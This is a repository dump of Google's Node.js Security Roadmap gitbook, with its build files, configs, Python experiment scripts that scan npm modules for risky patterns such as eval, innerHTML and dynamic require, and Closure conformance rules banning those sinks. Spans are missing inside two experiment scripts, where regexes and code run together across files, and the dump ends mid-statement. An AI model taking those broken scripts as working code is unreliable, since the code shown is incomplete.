├── .bookignore ├── .gitignore ├── .well-known └── security.txt ├── CONTRIBUTING.md ├── CONTRIBUTORS.md ├── LICENSE ├── Makefile ├── README.md ├── SUMMARY.md ├── app.yaml ├── appendix ├── .gitignore ├── bad-pattern-grep │ └── experiment.py ├── dyn-load │ └── experiment.py ├── experiments.md ├── jsconf │ ├── conformance_proto.textproto │ └── experiment.py ├── lazy-load │ └── experiment.py ├── py_common │ ├── __init__.py │ └── npm.py ├── test-code │ └── experiment.py ├── top100.txt └── uses-scripts │ └── experiment.py ├── book.json.withcomments ├── chapter-1 ├── recap.md ├── threat-0DY.md ├── threat-BOF.md ├── threat-CRY.md ├── threat-DEX.md ├── threat-DOS.md ├── threat-EXF.md ├── threat-LQC.md ├── threat-MTP.md ├── threat-QUI.md ├── threat-RCE.md ├── threat-SHP.md ├── threat-UIR.md └── threats.md ├── chapter-2 ├── bounded-eval.md ├── bundling.md ├── dynamism.md ├── example │ ├── .gitignore │ ├── graphs │ │ ├── filtered.dot │ │ ├── filtered.svg │ │ ├── full.dot │ │ └── full.svg │ ├── index.js │ ├── lib │ │ ├── dynamic.js │ │ ├── lazy.js │ │ ├── opt2.js │ │ └── static.js │ ├── make_dep_graph.sh │ ├── package.json │ └── test │ │ └── test.js ├── experiments │ └── webpack-compat │ │ ├── .gitignore │ │ ├── goodbye.js │ │ ├── hello.js │ │ ├── index.js │ │ ├── package.json │ │ ├── test-utils.js │ │ ├── test.sh │ │ ├── test │ │ └── test.js │ │ └── webpack.config.js ├── source-contents.md ├── synthetic-modules.md └── what-about-eval.md ├── chapter-3 └── knowing_dependencies.md ├── chapter-4 └── close_dependencies.md ├── chapter-5 └── oversight.md ├── chapter-6 └── failing.md ├── chapter-7 ├── child-processes.md ├── examples │ ├── sh │ │ ├── index.js │ │ ├── package.json │ │ └── test │ │ │ └── test.js │ └── sql │ │ ├── index.js │ │ ├── package.json │ │ └── test │ │ └── test.js ├── libraries.md ├── query-langs.md └── structured-strings.md ├── cover.md ├── images ├── FileExternal.svg ├── GitHub-Mark-32px.png ├── ic_print_24dp.svg └── npmjs-node.png ├── license.md ├── package-lock.json ├── package.json ├── styles └── website.css └── third_party ├── __init__.py └── jslex ├── __init__.py └── jslex.py /.bookignore: -------------------------------------------------------------------------------- 1 | app.yaml 2 | Makefile 3 | book.json.withcomments 4 | appendix/**/*.py 5 | appendix/**/*.textproto 6 | chapter-2/example/**/*.js 7 | chapter-2/experiments/**/*.js 8 | chapter-7/examples/**/*.js 9 | CONTRIBUTING.md 10 | **/*.sh 11 | third_party 12 | package.json 13 | package-lock.json 14 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # See appendix/README.md for how to run experiments. 2 | appendix/jsconf/externs 3 | appendix/tools 4 | # Generated by `npm install` 5 | node_modules 6 | npm-debug.log 7 | chapter-2/example/package-lock.json 8 | # Generated by Makefile 9 | www 10 | deploy 11 | .*.tstamp 12 | #book.json # Should be ignored but breaks gitbook 13 | # Generated by `gitbook serve 14 | _book 15 | # Emacs droppings 16 | .\#* 17 | *~ 18 | # Python droppings 19 | *.pyc 20 | -------------------------------------------------------------------------------- /.well-known/security.txt: -------------------------------------------------------------------------------- 1 | Contact: mikesamuel@gmail.com 2 | Acknowledgement: https://github.com/google/node-sec-roadmap/tree/master/CONTRIBUTORS.md 3 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # How to Contribute 2 | 3 | We'd love to accept your patches and contributions to this project. There are 4 | just a few small guidelines you need to follow. 5 | 6 | ## Contributor License Agreement 7 | 8 | Contributions to this project must be accompanied by a Contributor License 9 | Agreement. You (or your employer) retain the copyright to your contribution; 10 | this simply gives us permission to use and redistribute your contributions as 11 | part of the project. Head over to to see 12 | your current agreements on file or to sign a new one. 13 | 14 | You generally only need to submit a CLA once, so if you've already 15 | submitted one (even if it was for a different project), you probably 16 | don't need to do it again. 17 | 18 | ## Code reviews 19 | 20 | All submissions, including submissions by project members, require review. We 21 | use GitHub pull requests for this purpose. Consult 22 | [GitHub Help](https://help.github.com/articles/about-pull-requests/) for more 23 | information on using pull requests. 24 | -------------------------------------------------------------------------------- /CONTRIBUTORS.md: -------------------------------------------------------------------------------- 1 | * [Ali Ijaz Sheikh](https://github.com/ofrobots) 2 | * [Franziska Hinkelmann](https://github.com/fhinkel/) 3 | * [Jen Tong](https://github.com/mimming) 4 | * [John J. Barton](https://github.com/johnjbarton) 5 | * [Justin Beckwith](https://github.com/JustinBeckwith) 6 | * [Mark S. Miller](https://github.com/erights) 7 | * [Mike Samuel](https://github.com/mikesamuel) 8 | * [Myles Borins](https://github.com/mylesborins) 9 | 10 | Special thanks for feedback and criticism: 11 | 12 | * [Matteo Collina](https://github.com/mcollina) 13 | * [Rich Trott](https://github.com/Trott) 14 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Markdown and gitbook content is (C) Google LLC and is 2 | made available under 3 | https://creativecommons.org/licenses/by/4.0/ 4 | 5 | 6 | Code is avilable under the Apache 2.0 License 7 | --------------------------------------------- 8 | Copyright 2017 Google LLC 9 | 10 | Licensed under the Apache License, Version 2.0 (the "License"); 11 | you may not use this file except in compliance with the License. 12 | You may obtain a copy of the License at 13 | 14 | https://www.apache.org/licenses/LICENSE-2.0 15 | 16 | Unless required by applicable law or agreed to in writing, software 17 | distributed under the License is distributed on an "AS IS" BASIS, 18 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 19 | See the License for the specific language governing permissions and 20 | limitations under the License. -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | # This Makefile builds various versions of the Gitbook, runs 2 | # sanity checks, and sets up a deployment directory. 3 | # 4 | # See `make help` 5 | 6 | define HELP 7 | Targets 8 | ======= 9 | `make book` puts HTML files under www/ 10 | `make pdf` builds the PDF version 11 | `make serve_static` serve the book from http://localhost:4000/ 12 | `make serve` launch the builtin gitbook debug server 13 | `make check` runs sanity checks 14 | `make deploy` builds the deployment directory and runs checks 15 | 16 | Setup 17 | ===== 18 | This assumes that PATH includes 19 | https://github.com/gjtorikian/html-proofer 20 | https://calibre-ebook.com/download 21 | that the following environment variables point to reasonable values: 22 | HTML_PROOFER # path to htmlproofer executable 23 | CALIBRE_HOME # path to directory containing calibre executables 24 | 25 | Deploying 26 | ========= 27 | `make deploy` builds the deploy directory. 28 | From that directory `gcloud app deploy --project node-sec-roadmap` 29 | deploys to the canonical location if you have the right 30 | privileges and have run `gcloud auth login`. 31 | endef 32 | export HELP 33 | 34 | 35 | ROOT_DIR:=$(shell dirname $(realpath $(lastword $(MAKEFILE_LIST)))) 36 | 37 | # External dependency used to detect dead links 38 | ifeq ($(HTML_PROOFER),) 39 | HTML_PROOFER:=${HOME}/.gem/ruby/2.4.0/gems/html-proofer-3.8.0/bin/htmlproofer 40 | ifeq (,$(wildcard ${HTML_PROOFER})) 41 | HTML_PROOFER:=/bin/echo 42 | endif 43 | endif 44 | 45 | # External dependency used to build pdf 46 | ifeq ($(CALIBRE_HOME),) 47 | CALIBRE_HOME:=/Applications/calibre.app/Contents/console.app/Contents/MacOS/ 48 | endif 49 | 50 | 51 | # Bits that gitbook depends on 52 | GITBOOK_DEPS := node_modules book.json cover.md SUMMARY.md CONTRIBUTORS.md \ 53 | $(wildcard chapter-*/*.md) appendix/experiments.md \ 54 | styles/website.css images/* 55 | 56 | 57 | help: 58 | @echo "$$HELP" 59 | 60 | book.json : book.json.withcomments 61 | @cat book.json.withcomments \ 62 | | perl -ne 'print unless m/^[ \t]*#/' > book.json 63 | 64 | pdf : www/node-sec-roadmap.pdf 65 | www/node-sec-roadmap.pdf : $(GITBOOK_DEPS) 66 | PATH="${PATH}:./node_modules/.bin/:${CALIBRE_HOME}" \ 67 | ./node_modules/.bin/gitbook pdf . www/node-sec-roadmap.pdf 68 | 69 | book : www/.book.tstamp 70 | www/.book.tstamp : $(GITBOOK_DEPS) 71 | "${ROOT_DIR}"/node_modules/.bin/gitbook build . www 72 | @touch www/.book.tstamp 73 | 74 | check : .check.tstamp 75 | .check.tstamp : deploy/.deploy.tstamp 76 | touch .check.tstamp 77 | echo Checking that we correctly capitalize npm and Nodejs 78 | echo and that all Markdown link names are defined. 79 | @! find deploy/www/ -name \*.html \ 80 | | xargs egrep '\]\[|[nN][oO][dD][eE]J[sS]|\bN[Pp][Mm]\b' \ 81 | | egrep -v 'x\[a\]\[b\]|this\[x\]\[|[.]jfrog[.]com/' 82 | echo Checking for dead links 83 | @if [ "${HTML_PROOFER}" = "/bin/echo" ]; then \ 84 | echo "Warning: HTML_PROOFER not available"; \ 85 | else \ 86 | echo Running htmlproofer; \ 87 | "${HTML_PROOFER}" \ 88 | --alt-ignore=example/graphs/full.svg \ 89 | "${ROOT_DIR}"/deploy/www/; \ 90 | fi 91 | @find deploy -name node_modules \ 92 | || (echo "deploy/ should not include node_modules"; false) 93 | 94 | serve : $(GITBOOK_DEPS) 95 | "${ROOT_DIR}"/node_modules/.bin/gitbook serve 96 | 97 | serve_static : book 98 | pushd www; python -m SimpleHTTPServer 4000; popd 99 | 100 | clean : 101 | rm -rf www/ deploy/ _book/ book.json .*.tstamp 102 | 103 | node_modules : package.json 104 | npm install --only=prod 105 | @touch node_modules/ 106 | 107 | deploy : deploy/.deploy.tstamp check 108 | deploy/.deploy.tstamp : book pdf app.yaml 109 | rm -rf deploy/ 110 | mkdir deploy/ 111 | cp app.yaml deploy/ 112 | cp -r www/ deploy/www/ 113 | @touch deploy/.deploy.tstamp 114 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Node.js Security Roadmap 2 | 3 | The security roadmap is a [gitbook](https://toolchain.gitbook.com/) 4 | publication available at 5 | *[nodesecroadmap.fyi](https://nodesecroadmap.fyi)*. 6 | 7 | ```sh 8 | $ npm start 9 | ``` 10 | 11 | will serve the book via `localhost:4000`. 12 | 13 | ```sh 14 | $ make help 15 | ``` 16 | 17 | will display help information about other options. 18 | 19 | Please file errata at the 20 | [issue tracker](https://github.com/google/node-sec-roadmap/issues) 21 | or send us a pull request. 22 | 23 | If you'd like to help out, please also see our 24 | [contribution guidelines](CONTRIBUTING.md). 25 | -------------------------------------------------------------------------------- /SUMMARY.md: -------------------------------------------------------------------------------- 1 | # Summary 2 | 3 | * [Threat Environment](chapter-1/threats.md) 4 | * [Zero Day](chapter-1/threat-0DY.md) 5 | * [Buffer Overflow](chapter-1/threat-BOF.md) 6 | * [Weak Crypto](chapter-1/threat-CRY.md) 7 | * [Poor Developer Experience](chapter-1/threat-DEX.md) 8 | * [Denial of Service](chapter-1/threat-DOS.md) 9 | * [Exfiltration of Data](chapter-1/threat-EXF.md) 10 | * [Low Quality Code](chapter-1/threat-LQC.md) 11 | * [Malicious Third-Party Code](chapter-1/threat-MTP.md) 12 | * [Query Injection](chapter-1/threat-QUI.md) 13 | * [Remote Code Execution](chapter-1/threat-RCE.md) 14 | * [Shell Injection during Production](chapter-1/threat-SHP.md) 15 | * [Unintended Require](chapter-1/threat-UIR.md) 16 | * [Recap](chapter-1/recap.md) 17 | * [Dynamism when you need it](chapter-2/dynamism.md) 18 | * [Dynamic Bundling](chapter-2/bundling.md) 19 | * [Production Source Lists](chapter-2/source-contents.md) 20 | * [What about eval?](chapter-2/what-about-eval.md) 21 | * [Synthetic Modules](chapter-2/synthetic-modules.md) 22 | * [Bounded Eval](chapter-2/bounded-eval.md) 23 | * [Knowing your dependencies](chapter-3/knowing_dependencies.md) 24 | * [Keeping your dependencies close](chapter-4/close_dependencies.md) 25 | * [Oversight](chapter-5/oversight.md) 26 | * [When all else fails](chapter-6/failing.md) 27 | * [Library support for safe coding practices](chapter-7/libraries.md) 28 | * [Query languages](chapter-7/query-langs.md) 29 | * [Child processes](chapter-7/child-processes.md) 30 | * [Structured strings](chapter-7/structured-strings.md) 31 | 32 | ---- 33 | 34 | * [Appendix: Experiments](appendix/experiments.md) 35 | * [Contributors](CONTRIBUTORS.md) 36 | * [License](license.md) 37 | * [Errata](https://github.com/google/node-sec-roadmap/issues) 38 | -------------------------------------------------------------------------------- /app.yaml: -------------------------------------------------------------------------------- 1 | # cloud.google.com/appengine/docs/standard/python/config/appref 2 | runtime: python27 3 | api_version: 1 4 | threadsafe: true 5 | 6 | handlers: 7 | - url: / 8 | static_files: www/index.html 9 | upload: www/index.html 10 | secure: always 11 | mime_type: text/html; charset=UTF-8 12 | expiration: 30m 13 | 14 | - url: /(.*[.]html)$ 15 | static_files: www/\1 16 | upload: www/(.*[.]html)$ 17 | secure: always 18 | mime_type: text/html; charset=UTF-8 19 | expiration: 30m 20 | 21 | - url: /(.*[.]css)$ 22 | static_files: www/\1 23 | upload: www/(.*[.]css)$ 24 | secure: always 25 | mime_type: text/css; charset=UTF-8 26 | expiration: 30m 27 | 28 | - url: /(.*[.]js)$ 29 | static_files: www/\1 30 | upload: www/(.*[.]js)$ 31 | secure: always 32 | mime_type: text/javascript; charset=UTF-8 33 | expiration: 30m 34 | 35 | - url: /(.*[.]json)$ 36 | static_files: www/\1 37 | upload: www/(.*[.]json)$ 38 | secure: always 39 | mime_type: application/json; charset=UTF-8 40 | expiration: 30m 41 | 42 | - url: /(.*[.]txt)$ 43 | static_files: www/\1 44 | upload: www/(.*[.]txt)$ 45 | secure: always 46 | mime_type: text/plain; charset=UTF-8 47 | expiration: 30m 48 | 49 | - url: /(.*[.]svg)$ 50 | static_files: www/\1 51 | upload: www/(.*[.]svg)$ 52 | secure: always 53 | mime_type: image/svg+xml; charset=UTF-8 54 | expiration: 30m 55 | 56 | - url: /(.*[.](ico|dot|eot|otf|png|ttf|woff|woff2|pdf))$ 57 | static_files: www/\1 58 | upload: www/(.*[.](ico|dot|eot|otf|png|ttf|woff|woff2|pdf))$ 59 | secure: always 60 | expiration: 30m 61 | 62 | skip_files: 63 | - ^(.*/)?#.*#$ 64 | - ^(.*/)?.*~$ 65 | - ^(.*/)?.*\.py[co]$ 66 | - ^(.*/)?.*/RCS/.*$ 67 | - ^(.*/)?\.(?!well-known(?:/|$)).*$ 68 | -------------------------------------------------------------------------------- /appendix/.gitignore: -------------------------------------------------------------------------------- 1 | node_modules/** 2 | separate-modules/** 3 | **~ 4 | **.pyc 5 | -------------------------------------------------------------------------------- /appendix/bad-pattern-grep/experiment.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # Copyright 2017 Google LLC 4 | # 5 | # Licensed under the Apache License, Version 2.0 (the "License"); 6 | # you may not use this file except in compliance with the License. 7 | # You may obtain a copy of the License at 8 | # 9 | # https://www.apache.org/licenses/LICENSE-2.0 10 | # 11 | # Unless required by applicable law or agreed to in writing, software 12 | # distributed under the License is distributed on an "AS IS" BASIS, 13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | # See the License for the specific language governing permissions and 15 | # limitations under the License. 16 | 17 | """ 18 | Look for problematic patterns like calls to eval and assignments 19 | to innerHTML that often lead to XSS when not consistently guarded. 20 | """ 21 | 22 | import py_common.npm 23 | import re 24 | import sys 25 | 26 | _LEFT_BOUNDARY = r'(?> 2], 103 | values[len(values) >> 1], 104 | values[(len(values) * 3) >> 2], 105 | ) 106 | print "| `%s` | %d | %d | %s |" % ( 107 | v, count, total_count, quartiles) 108 | -------------------------------------------------------------------------------- /appendix/dyn-load/experiment.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # Copyright 2017 Google LLC 4 | # 5 | # Licensed under the Apache License, Version 2.0 (the "License"); 6 | # you may not use this file except in compliance with the License. 7 | # You may obtain a copy of the License at 8 | # 9 | # https://www.apache.org/licenses/LICENSE-2.0 10 | # 11 | # Unless required by applicable law or agreed to in writing, software 12 | # distributed under the License is distributed on an "AS IS" BASIS, 13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | # See the License for the specific language governing permissions and 15 | # limitations under the License. 16 | 17 | """Looks for dynamic code loading patterns. 18 | 19 | Patterns to identify include 20 | 21 | * require(...) where ... is not a string literal. 22 | * eval 23 | * Function(...) where there is more than one argument or the sole 24 | argument is not a function. 25 | 26 | """ 27 | 28 | import json 29 | import os.path 30 | import py_common.npm 31 | import re 32 | import shutil 33 | import sys 34 | 35 | 36 | dynamic_load_pattern = re.compile( 37 | r'(? 9 | 10 | ## Grepping for Problems {#grep-problems} 11 | 12 | JS Conformance uses sophisticated type reasoning to find 13 | problems in JavaScript code 14 | (see [JS Conformance experiment](#jsconf)). 15 | It may not find problems in code that lacks type hints 16 | or that does not parse. 17 | 18 | Grep can be used to reliably find some subset of problems that 19 | JS Conformance can identify. 20 | 21 | If grep finds more of the kinds of problems that it can find 22 | than JS Conformance, then the code cannot be effectively vetted 23 | by code quality tools like JS Conformance. 24 | 25 | | Violation | Count of Modules | Total Count | Quartiles | 26 | | --------- | ---------------- | ----------- | --------- | 27 | | `Function constructor` | 32 | 200 | 0 / 0 / 1 | 28 | | `URL property assignment` | 35 | 471 | 0 / 0 / 3 | 29 | | `eval` | 24 | 87 | 0 / 0 / 0 | 30 | | `innerHTML assignment` | 17 | 81 | 0 / 0 / 0 | 31 | 32 | ## Dynamic loads {#dynamic_load} 33 | 34 | Dynamic loading can complicate code bundling. 35 | 36 | 33 of 108 = 30.56% call `require(...)` without a literal string argument. 37 | 38 | ## JS Conformance {#jsconf} 39 | 40 | JS Conformance identifies uses of risky APIs. 41 | 42 | Some modules did not parse. This may be dues to typescript. 43 | JSCompiler doesn't deal well with mixed JavaScript and TypeScript 44 | inputs. 45 | 46 | If a module is both in the top 100 and is a dependency of another 47 | module in the top 100, then it will be multiply counted. 48 | 49 | Out of 69 modules that parsed 50 | 51 | | Violation | Count of Modules | Total Count | Quartiles | 52 | | --------- | ---------------- | ----------- | --------- | 53 | | `"arguments.callee" cannot be used in strict mode` | 2 | 3 | 0 / 0 / 0 | 54 | | `Argument list too long` | 8 | 8 | 0 / 0 / 0 | 55 | | `Illegal redeclared variable: ` | 2 | 9 | 0 / 0 / 0 | 56 | | `Parse error.` | 31 | 232 | 0 / 0 / 2 | 57 | | `This style of octal literal is not supported in strict mode.` | 4 | 11 | 0 / 0 / 0 | 58 | | `Violation: Assigning a value to a dangerous property via setAttribute is forbidden` | 1 | 4 | 0 / 0 / 0 | 59 | | `Violation: Function, setTimeout, setInterval and requestAnimationFrame are not allowed with string argument. See ...` | 9 | 91 | 0 / 0 / 0 | 60 | | `Violation: eval is not allowed` | 1 | 3 | 0 / 0 / 0 | 61 | | `required "..." namespace not provided yet` | 7 | 30 | 0 / 0 / 0 | 62 | | `type syntax is only supported in ES6 typed mode: ` | 3 | 132 | 0 / 0 / 0 | 63 | 64 | ## Lazy loads {#lazy_load} 65 | 66 | Lazy loading can complicate code bundling if care is not taken. 67 | 68 | 71 of 108 = 65.74% contain a use of require inside a `{...}` block. 69 | 70 | 71 | ## Prod bundle includes test code {#test_code} 72 | 73 | Some of the top 100 modules are test code, e.g. mocha, chai. 74 | This measures which modules, when installed `--only=prod` include 75 | test patterns. 76 | 77 | 50 of 108 = 46.30% contain test code patterns 78 | 79 | 80 | ## Uses Scripts {#uses_scripts} 81 | 82 | Unless steps are taken, installation scripts run code on 83 | a developer's workstation when they have write access to 84 | local repositories. If this number is small, having 85 | humans check installation scripts before running might 86 | be feasible. 87 | 88 | 4 of 979 = 0.41% use installation scripts 89 | 90 | 91 | 92 | 93 | 94 | 95 | ## Methodology 96 | 97 | The code is [available on Github][code]. 98 | 99 | ```bash 100 | $ npm --version 101 | 3.10.10 102 | ``` 103 | 104 | ### Top 100 Module list 105 | 106 | I extracted `top100.txt` by browsing to the most depended-upon 107 | [package list][top100] and running the below in the dev console until 108 | I had >= 100 entries. 109 | 110 | ```js 111 | var links = document.querySelectorAll('a.name') 112 | var top100 = Object.create(null) 113 | for (var i = 0; i < links.length; ++i) { 114 | var link = links[i]; 115 | var packageName = link.getAttribute('href').replace(/^.*\/package\//, '') 116 | top100[packageName] = true; 117 | } 118 | var top100Names = Object.keys(top100) 119 | top100Names.sort(); 120 | top100Names 121 | ``` 122 | 123 | ---- 124 | 125 | We also require some tools so that we can run JSCompiler against 126 | node modules. From the root directory: 127 | 128 | ```sh 129 | mkdir tools 130 | curl https://dl.google.com/closure-compiler/compiler-latest.zip \ 131 | > /tmp/closure-latest.zip 132 | pushd tools 133 | jar xf /tmp/closure-latest.zip 134 | popd 135 | pushd jsconf 136 | mkdir externs 137 | pushd externs 138 | git clone https://github.com/dcodeIO/node.js-closure-compiler-externs.git 139 | popd 140 | popd 141 | ``` 142 | 143 | 144 | ### Experiments 145 | 146 | Each experiment corresponds to a directory with an executable 147 | `experiment.py` file which takes a `node_modules` directory and the top 100 148 | module list and which outputs a snippet of markup. 149 | 150 | Running 151 | 152 | ```bash 153 | cat top100.txt | xargs npm install --ignore-scripts --only=prod 154 | mkdir separate-modules 155 | cd separate-modules 156 | for pn in $(cat ../top100.txt ); do 157 | mkdir -p "$pn" 158 | pushd "$pn" 159 | npm install -g --prefix="node_modules/$pn" --ignore-scripts --only=prod "$pn" 160 | popd 161 | done 162 | ``` 163 | 164 | pulls down the list of node modules. As of this writing, there are 980 165 | modules that are in the top100 list or are direct or indirect prod 166 | dependencies thereof. 167 | 168 | To run the experiments and place the outputs under `/tmp/mds/`, run 169 | 170 | ```bash 171 | mkdir -p /tmp/mds/ 172 | export PYTHONPATH="$PWD:$PWD/../third_party:$PYTHONPATH" 173 | for f in *; do 174 | if [ -f "$f"/experiment.py ]; then 175 | "$f"/experiment.py node_modules separate-modules top100.txt \ 176 | > "/tmp/mds/$f.md" 177 | fi 178 | done 179 | ``` 180 | 181 | Concatenating those markdown snippets produces the summary above. 182 | 183 | ```bash 184 | (for f in $(echo /tmp/mds/*.md | sort); do 185 | cat "$f"; 186 | done) \ 187 | > /tmp/mds/summary 188 | ``` 189 | 190 | [code]: https://github.com/google/node-sec-roadmap/tree/master/appendix 191 | [top100]: https://www.npmjs.com/browse/depended 192 | -------------------------------------------------------------------------------- /appendix/jsconf/conformance_proto.textproto: -------------------------------------------------------------------------------- 1 | # Copyright 2014 The Closure Compiler Authors. 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"); 4 | # you may not use this file except in compliance with the License. 5 | # You may obtain a copy of the License at 6 | # 7 | # http://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 14 | 15 | # This file contains example JS conformance configurations for various problems 16 | # with JavaScript. Since each project may want to opt-in to different rules, and 17 | # each project may need its own specific whitelist, the examples in this file 18 | # are meant to be copied to a project specific conformance_proto.textproto file. 19 | 20 | requirement: { 21 | type: BANNED_NAME 22 | error_message: 'eval is not allowed' 23 | 24 | value: 'eval' 25 | 26 | whitelist: 'javascript/closure/base.js' 27 | whitelist: 'javascript/closure/json/json.js' 28 | } 29 | 30 | requirement: { 31 | rule_id: 'closure:stringFunctionDefinition' 32 | type: RESTRICTED_NAME_CALL 33 | 34 | value: 'Function:function()' 35 | value: 'setTimeout:function(string, ...?)' 36 | value: 'setImmediate:function(string, ...?)' 37 | value: 'setInterval:function(string, ...?)' 38 | value: 'requestAnimationFrame:function(string, ...?)' 39 | 40 | error_message: 'Function, setTimeout, setInterval and requestAnimationFrame are not allowed with string argument. See ...' 41 | } 42 | 43 | requirement: { 44 | rule_id: 'closure:windowStringFunctionDefinition' 45 | type: RESTRICTED_METHOD_CALL 46 | 47 | value: 'Window.prototype.setTimeout:function(string, ...?)' 48 | value: 'Window.prototype.setImmediate:function(string, ...?)' 49 | value: 'Window.prototype.setInterval:function(string, ...?)' 50 | value: 'Window.prototype.requestAnimationFrame:function(string, ...?)' 51 | 52 | error_message: 'window.setTimeout, setInterval and requestAnimationFrame are not allowed with string argument. See ...' 53 | } 54 | 55 | requirement: { 56 | type: BANNED_PROPERTY 57 | error_message: 'Arguments.prototype.callee' 58 | 59 | value: 'Arguments.prototype.callee' 60 | 61 | whitelist: 'javascript/closure/base.js' # goog.base uses arguments.callee 62 | whitelist: 'javascript/closure/debug/' # legacy stack trace support, etc 63 | } 64 | 65 | requirement: { 66 | type: BANNED_PROPERTY_WRITE 67 | error_message: 'Assignment to Element.prototype.innerHTML is not allowed' 68 | 69 | value: 'Object.innerHTML' 70 | 71 | # Safe wrapper for this property. 72 | whitelist: 'javascript/closure/dom/safe.js' 73 | 74 | # Safely used in goog.string.unescapeEntitiesUsingDom_; the string assigned to 75 | # innerHTML is a single HTML entity. 76 | whitelist: 'javascript/closure/string/string.js' 77 | } 78 | 79 | requirement: { 80 | type: BANNED_PROPERTY_WRITE 81 | error_message: 'Assignment to Element.prototype.outerHTML is not allowed' 82 | 83 | value: 'Object.outerHTML' 84 | 85 | # Safe wrapper for this property. 86 | whitelist: 'javascript/closure/dom/safe.js' 87 | } 88 | 89 | requirement: { 90 | type: BANNED_PROPERTY_WRITE 91 | error_message: 'Assignment to Location.prototype.href is not allowed' 92 | 93 | value: 'Location.prototype.href' 94 | 95 | # Safe wrapper for this property. 96 | whitelist: 'javascript/closure/dom/safe.js' 97 | } 98 | 99 | requirement: { 100 | type: BANNED_PROPERTY_WRITE 101 | error_message: 'Assignment to location is not allowed' 102 | 103 | value: 'Window.prototype.location' 104 | } 105 | 106 | requirement: { 107 | type: BANNED_PROPERTY_WRITE 108 | error_message: 'Assignment to .href property or src' 109 | 110 | # Types with .href properties that do not extend from Element. 111 | # value: 'StyleSheet.prototype.href' 112 | # value: 'CSSImportRule.prototype.href' 113 | 114 | # All other types extend from Element. 115 | # value: 'Element.prototype.href' 116 | value: 'Object.href' 117 | value: 'Object.src' 118 | 119 | # Safe wrapper for this property. 120 | whitelist: 'javascript/closure/dom/safe.js' 121 | } 122 | 123 | requirement: { 124 | rule_id: 'setAttribute URL' 125 | type: BANNED_CODE_PATTERN 126 | error_message: 'Assigning a value to a dangerous property via setAttribute is forbidden' 127 | value: 128 | '/**\n' 129 | ' * @param {*} element\n' 130 | ' * @param {?} value\n' 131 | ' */\n' 132 | 'function template(element, value) {' 133 | ' element.setAttribute(\'src\', value);' 134 | '}' 135 | value: 136 | '/**\n' 137 | ' * @param {*} element\n' 138 | ' * @param {?} value\n' 139 | ' */\n' 140 | 'function template(element, value) {\n' 141 | ' element.setAttribute(\'href\', value);\n' 142 | '}' 143 | } 144 | 145 | requirement: { 146 | type: BANNED_PROPERTY_WRITE 147 | error_message: 'Use of document.domain is not allowed' 148 | 149 | value: 'Document.prototype.domain' 150 | } 151 | -------------------------------------------------------------------------------- /appendix/jsconf/experiment.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | Runs JSConformance on each of the top 100 modules and collates the results. 5 | """ 6 | 7 | # Copyright 2017 Google LLC 8 | # 9 | # Licensed under the Apache License, Version 2.0 (the "License"); 10 | # you may not use this file except in compliance with the License. 11 | # You may obtain a copy of the License at 12 | # 13 | # https://www.apache.org/licenses/LICENSE-2.0 14 | # 15 | # Unless required by applicable law or agreed to in writing, software 16 | # distributed under the License is distributed on an "AS IS" BASIS, 17 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 18 | # See the License for the specific language governing permissions and 19 | # limitations under the License. 20 | 21 | import json 22 | import os.path 23 | import py_common.npm 24 | import re 25 | import shutil 26 | import subprocess 27 | import sys 28 | 29 | 30 | _error_re = re.compile(r'(?m)^\S+: ERROR - ((?![.]\s)[^\r\n]*)') 31 | # Patterns that can be used to group error messages by glossing over 32 | # any content not in a capturing group. 33 | _simplifier_res = ( 34 | re.compile(r'^(required ").*?(" namespace not provided yet)'), 35 | re.compile(r'^(type syntax is only supported in ES6 typed mode: ).*'), 36 | re.compile(r'^(Illegal redeclared variable: ).*'), 37 | re.compile(r'^(Parse error[.]).*'), 38 | ) 39 | 40 | 41 | def run_jsconf(node_modules, module_name, externs): 42 | """ 43 | Runs JSConformance on the given module's source files. 44 | """ 45 | srcs = py_common.npm.js_srcs_almost_worst_case( 46 | node_modules, module_name, 47 | module_filter=py_common.npm.ignore_tools_that_can_run_early(module_name)) 48 | if not srcs: 49 | raise Exception(module_name + ' has no srcs') 50 | args = [ 51 | 'java', 52 | '-jar', 53 | os.path.join( 54 | os.path.dirname(node_modules), 55 | 'tools', 56 | 'closure-compiler-latest', 57 | 'closure-compiler.jar'), 58 | '--process_common_js_modules', 59 | '--checks-only', 60 | '--third_party=true', 61 | '--module_resolution=NODE', 62 | '--js_module_root=%s' % os.path.realpath(node_modules), 63 | '--jscomp_error=conformanceViolations', 64 | '--conformance_configs', 65 | os.path.join( 66 | os.path.dirname(node_modules), 67 | 'jsconf', 68 | 'conformance_proto.textproto'), 69 | ] 70 | for (_, js_file) in srcs: 71 | args += ['--js', os.path.realpath(js_file)] 72 | for js_file in sorted(externs): 73 | args += ['--externs', js_file] 74 | #print >>sys.stderr, len(' '.join(args)) 75 | if len(' '.join(args)) >= 240000: # `getconf ARG_MAX` for Mac OSX 76 | return ['Argument list too long'] 77 | process = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) 78 | content = process.stdout.read() 79 | retcode = process.wait() 80 | violations = [] 81 | if retcode == 0: 82 | violations.append('Passed') 83 | for match in _error_re.finditer(content): 84 | violation = match.group(1) 85 | for simpler in _simplifier_res: 86 | match = simpler.match(violation) 87 | if match: 88 | violation = '...'.join(match.groups()) 89 | violations.append(violation) 90 | return violations 91 | 92 | if __name__ == '__main__': 93 | (node_modules, separate_modules, top100_txt) = 